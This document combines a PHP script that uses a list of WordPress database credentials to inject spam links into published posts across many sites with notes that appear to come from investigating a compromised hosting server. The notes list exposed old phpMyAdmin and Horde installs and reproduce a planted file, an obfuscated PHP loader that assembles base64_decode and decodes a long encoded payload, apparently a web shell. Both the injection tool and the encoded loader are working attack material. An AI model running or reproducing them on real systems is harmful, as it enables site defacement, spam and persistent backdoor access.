<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>automatical inserter links to wordpress database</title> <script> function hide() { var obj = document.getElementById("message"); obj.style.display = "none"; } setTimeout(hide, 5000); </script> </head> <body> <?php DEFINE('DBG', 0); DEFINE('SEP', ' | '); DEFINE('BR', '<BR>'.PHP_EOL); DEFINE('NPOST', 4); DEFINE('LOG_EXT', '.log'); DEFINE('PROC_LOG', 'process'); DEFINE('CON_LOG', 'connect'); DEFINE('REV_LOG', 'reverse'); DEFINE('LIST_DB', 'pass.txt'); DEFINE('ARCH', $_SERVER['SERVER_NAME'].'.tar.gz'); ini_set("display_errors","1"); ini_set("display_startup_errors","1"); ini_set("memory_limit","1000M"); @set_time_limit ( 0 ); @ini_set ( 'max_execution_time', 0 ); $params = array(); $params['pswd'] = "pass"; $params['links'] = "links"; $logs = array(); $logs['connect'] = CON_LOG; $logs['process'] = PROC_LOG; $logs['reverse'] = REV_LOG; echo "<div id=\"message\">"; echo checkInstall($params, "txt"); echo checkInstall($logs, "log"); echo "</div>"; ?> <h1>Actions</h1> <form action="<?=$_SERVER['SCRIPT_NAME'] ?>"> <input type="radio" name="flink" value="links_txt" >links.txt <input type="radio" name="flink" value="links1_txt">links1.txt <input type="hidden" name="a" value="post" /> <input type="submit" value="post links"> </form> <a href="?a=reverse">reverse posting</a><br /> <h2>Logs</h2> <a href="?l=connect">connections.log</a><br /> <a href="?l=process"><?php echo(PROC_LOG) ?>.log</a><br /> <a href="?l=reverse">reverse.log</a><br /> <br /> <a href="?d=true">archive logs</a><br /> <div style="margin-top: 15px; clear: both; border-top: 1px dotted #999;"> <?php $flink = 'links.txt'; if(isset($_GET['flink'])){ if($_GET['flink'] == 'links_txt') { $flink = 'links.txt';} if($_GET['flink'] == 'links1_txt') { $flink = 'links1.txt';} } if (isset($_GET['l'])) { showLog($_GET['l']); } if (isset($_GET['d'])) { preDownloadLogs(); } if (isset($_GET['a'])) { if($_GET['a'] == 'post') { postLinks($flink); } if($_GET['a'] == 'reverse') { reverse_posting(); } } function postLinks($flink = 'links.txt') { $lch = fopen("connect.log", "w"); $num_of_bd = 0; $pswds = get_ar_file(LIST_DB); $links = get_ar_file($flink); if($pswds AND $links){ $num_of_bd = COUNT($pswds); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd); $num_of_links = COUNT($links); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd .'FILE - <strong>'.$flink.'</strong>; COUNT OF LINKS - ' .$num_of_links); } else { fwrite($lch, "!ERR: pswd OR ".$flink."file not exist\n"); return FALSE; } $total_updates = $n_bases = $i_url = 0; foreach ($pswds as $a_line) { $atr = get_db_atr($a_line); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($db->status != "connected") { fwrite($lch, "<span style='color:#fb0000;'>".$db->status ."</span>\n<br>"); } $get_url = $db->fetch_assoc("SELECT `option_value` FROM `wp_options` WHERE `option_name` = 'siteurl' OR `option_name` = 'home'"); if (isset($get_url[0]['option_value'])) { $tmp_url = $get_url[0]['option_value']; } else if (isset($get_url[1]['option_value'])) { $tmp_url = $get_url[1]['option_value']; } else { $tmp_url = "http://"; } if ($tmp_url != "http://") { $find_s_pattern = "/http\:\/\/.+\.[a-zA-Z0-9]{0,5}[\.a-zA-Z0-9]{0,5}?/i"; if (preg_match($find_s_pattern, $tmp_url, $matches)) { $tmp_url = $matches[0]."."; } else { $tmp_url = $tmp_url."."; } } $res = $db->fetch_assoc("SELECT `ID`, `guid`, `post_content` FROM `".$atr['pref']."posts` WHERE `post_status` = 'publish' AND post_type='post'"); $count_posts = count($res); $str_scr = 'TOTAL COUNT OF POST IN '.trim($a_line).' - '.$count_posts; $pattern = "~.*?[.?!](?:\s|$)~s"; $ret_arr = array(); $r_idx = NULL; $saved_links = $empty_links = $count_post_ready_to_injekt = $count_good_post = 0; if(isset($res)){ foreach($res as $key => $val){ $prop = $val['post_content']; if(preg_match_all($pattern, $prop, $proposals)) { $r_idx = array_rand($proposals[0]); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); if (!$fl_p_ok){ $empty_links++; dbg_prn('EMPTY POST'); dbg_prn($val); } else { $fl = FALSE; foreach ($links as $content) { $link_in_post = FALSE; $poisk = trim($content); $link_in_post = strpos($val['post_content'], $poisk); if($link_in_post){ $have_id = $val['ID']; $saved_links++; dbg_prn($have_id.' already have an injected url. ' .$poisk); $fl = TRUE; } } } if (($fl_p_ok) AND (!$fl)) { $ret_arr[] = $val; } } else { $empty_links++; } } $res = $ret_arr; unset($ret_arr); $count_good_post = count($res); $str_scr .= ' COUNT OF INJECTED POST - '.$saved_links .' COUNT OF EMPTY POST - '.$empty_links .' COUNT OF GOOD POST - '.$count_good_post; dbg_prn($str_scr); dbg_prn($res); $count_post_ready_to_injekt = $count_posts - $saved_links - $empty_links; if ($count_good_post >= NPOST) { $num_upd_post = NPOST; }else{ $num_upd_post = $count_good_post; } } else { dbg_prn('EMPTY RESULT (NO POST IN BATABASE)'); } if(isset($res) AND ($num_upd_post > 0) ){ dbg_prn($res); dbg_prn($num_upd_post); $random_keys = array_rand($res, $num_upd_post); if(isset($random_keys)){ if($random_keys == 0){ $tmp_ar = Array(); $tmp_ar[] = 0; $random_keys = $tmp_ar; } foreach ($random_keys as $post) { $url_unit = $links[$i_url]; $prop = $res[$post]['post_content']; preg_match_all($pattern, $prop, $proposals); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); $prop_ar = explode(" ", $prop); $unic = array_unique($prop_ar); $diff = array_diff_assoc($prop_ar, $unic); $out = array_diff($prop_ar, $diff); $word_rkey = array_rand($out); $word = $prop_ar[$word_rkey]; $cnt_word = $replace_unit = NULL; dbg_prn($prop); $zam = " ".$url_unit." ".$word." "; $replace_unit = str_replace($word, $zam, $prop, $cnt_word); dbg_prn($cnt_word); dbg_prn($replace_unit); $cnt_prop = $posting_string = NULL; $posting_string = str_replace($prop, $replace_unit, $res[$post]['post_content'], $cnt_prop); dbg_prn($posting_string); dbg_prn($cnt_prop); $count = 1; if(isset($posting_string) AND $cnt_prop == 1 AND $fl_p_ok){ $upd = "UPDATE `".$atr['pref']."posts` SET `post_content`='" .addslashes($posting_string) ."' WHERE `ID` = ".$res[$post]['ID'].""; $db->query($upd); $total_updates++; $log['dt'] = date("Y-m-d H:i"); $log['id'] = (int)$res[$post]['ID']; $log['guid'] = trim($res[$post]['guid']); $log['bd'] = trim($a_line); $log['link'] = (int)($i_url+1); $log['url'] = trim($url_unit); $log_str = implode(SEP, $log); dbg_prn($log_str, TRUE); Log::write($log_str, PROC_LOG); $i_url++; if($i_url >= $num_of_links){ $i_url = 0;} } else { $log_str = date("Y-m-d H:i").SEP.(int)$res[$post]['ID']. SEP.trim($res[$post]['guid']).' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } } else { $log_str = date("Y-m-d H:i").SEP.$random_keys .' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } $n_bases++; fwrite($lch, date("Y-m-d H:i").": ".$atr['host']." Walthru OK no errors<br>\n"); unset($db); unset($res); } fclose($lch); echo "<div style='padding: 5px; background: #ccc'>Post injected: ".$total_updates."</div>"; echo "<div style='padding: 5px; background: #ccc'>Bases walked: ".$n_bases."</div>"; } function reverse_posting() { $reverses = get_ar_file( PROC_LOG.LOG_EXT ); if(isset($reverses)){ foreach ($reverses as $reverse) { if(strlen($reverse) > 20){ LIST($log['dt'], $log['id'], $log['guid'], $log['bd'], $log['link'], $log['url']) = explode(SEP, $reverse); $atr = get_db_atr($log['bd']); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($res = $db->fetch_row("SELECT `post_content` FROM `".$atr['pref']."posts` WHERE `ID` = '".$log['id']."'")) { $replace_unit = str_replace(trim($log['url']), '', $res[0][0], $count); if($count > 0){ $db->query("UPDATE `".$atr['pref']."posts` SET `post_content`='".$replace_unit."' WHERE `ID` = '".$log['id']."'"); $stat = ' successfully restored'; }else{$stat = ' not contain url';} $log_str = date("Y-m-d H:i").' POST - '.$log['guid'].$stat; dbg_prn($log_str, TRUE); Log::write($log_str, 'reverse'); } else {echo "Somthing wrong: ".$db->errors;} unset($res); unset($db); } } } unset($reverses); } function get_db_atr($str) { LIST($atr['host'], $atr['user'], $atr['pass'], $atr['db'], $atr['pref']) = explode(':', trim($str)); return $atr; } function checkInstall ($params, $type) { foreach ($params as $key=>$value) { $filename = $value.".".$type; if (!file_exists($filename)) { $fh = fopen($filename, "w"); fclose($fh); echo "Conf file <b>".$filename."</b> created<br />\n"; } } } class db { protected $link; private $server, $username, $password, $db; public $status; public $errors=""; public function __construct($server, $username, $password, $db) { $this->server = $server; $this->username = $username; $this->password = $password; $this->db = $db; return $this->connect(); } private function connect() { if ($this->link = mysql_connect($this->server, $this->username, $this->password)) { mysql_select_db($this->db); mysql_query("SET NAMES UTF8"); $this->status = "connected"; } else { $this->status = "Could not connect to ".$this->username."@".$this->server; } } public function fetch_assoc($query) { $result = mysql_query($query); $i = 0; $this->errors = mysql_error()."\n"; while($r = mysql_fetch_assoc($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function fetch_row($query) { $result = mysql_query($query); $this->errors = mysql_error()."\n"; $i = 0; while($r = mysql_fetch_row($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function query($q) { mysql_query($q); } public function __destruct() { @mysql_close($this->link); } } function showLog($log_type = PROC_LOG) { $file = get_ar_file($log_type.LOG_EXT); if($file){ foreach($file as $log){ echo htmlspecialchars($log).BR; } } } function preDownloadLogs() { if (file_exists(ARCH)){ unlink(ARCH); } $output = exec( 'tar -czvf '.ARCH.' process.log connect.log' ); if (is_null ( $output )) { echo "error gzip"; } else { echo "<pre>log package <b>".ARCH."</b> created</pre>"; echo "<a href='".ARCH."'>download logs</a>"; } } function dbg_prn($s, $fl= DBG) { if($fl) { $pre = $post = NULL; $pre = '<PRE>'; $post ='</PRE>'; echo $pre; print_r($s); echo $post.PHP_EOL; }} class Log{ static function write($mess="", $name="info_error"){ if(strlen(trim($mess)) < 2){ return FALSE; } if(preg_match("/^([_a-z0-9A-Z]+)$/i", $name, $matches)){ $text = $mess.PHP_EOL; $filename = $name.LOG_EXT; if(!is_writable($filename)) { dbg_prn('Is NOT writable file '.$filename);return FALSE; } if (!$handle = fopen($filename, "a+")) {dbg_prn('Cannot open file '.$filename);return FALSE;} @flock ($handle, LOCK_EX); if(fwrite ($handle, $text)=== FALSE ) {dbg_prn('Cannot write to file '.$filename);return FALSE;} @flock ($handle, LOCK_UN); if (!fclose($handle)) {dbg_prn('Cannot close file '.$filename); return FALSE;} return TRUE; }else{return FALSE;} } } function get_ar_file($name) { $mas = Array(); if(is_readable($name)) { $handle = fopen($name, 'r'); if($handle){ while (!feof($handle)) { $mas[]= trim(fgets($handle)); } fclose($handle); }else{ dbg_prn("BAD FILE :".$name); return NULL; } $handle = NULL; return $mas; }else{ dbg_prn('FILE :'.$name.' is not a readable'); return NULL; } } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } ?> </div> </body> </html>
Old phpMyAdmin versions still accessable over the network
drwxr-xr-x 9 confixx confixx 4096 Nov 28 2011 phpMyAdmin-2.11.9.5-all-languages (htaccess restriction) drwxr-xr-x 10 confixx confixx 4096 Sep 17 10:36 phpMyAdmin-3.4.9-all-languages (accessable) -rw-r--r-- 1 root root 6833680 Apr 16 2013 phpMyAdmin-3.5.8-all-languages_share.zip drwxr-xr-x 9 root root 4096 Jul 18 2013 phpMyAdmin-4.0.4.1 (accessable) drwxr-xr-x 9 root root 4096 Jun 10 2014 phpMyAdmin-4.2.3-all-languages
Old horde versions still accessable
drwxr-xr-x 24 confixx confixx 4096 Nov 28 2011 poplogin drwxr-xr-x 22 confixx confixx 4096 Nov 28 2011 poplogin.20100924 (accessable) drwxr-xr-x 3 confixx confixx 4096 Nov 28 2011 poplogin.orig1 (accessable)
login-63.hoststar.ch
include/template/templates_c/sys.php
-> from site http://profexer.name/pas/download.php
<?php $_f___f='base'.(32*2).'_de'.'code';$_f___f=$_f___f(str_replace("\n", '', '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 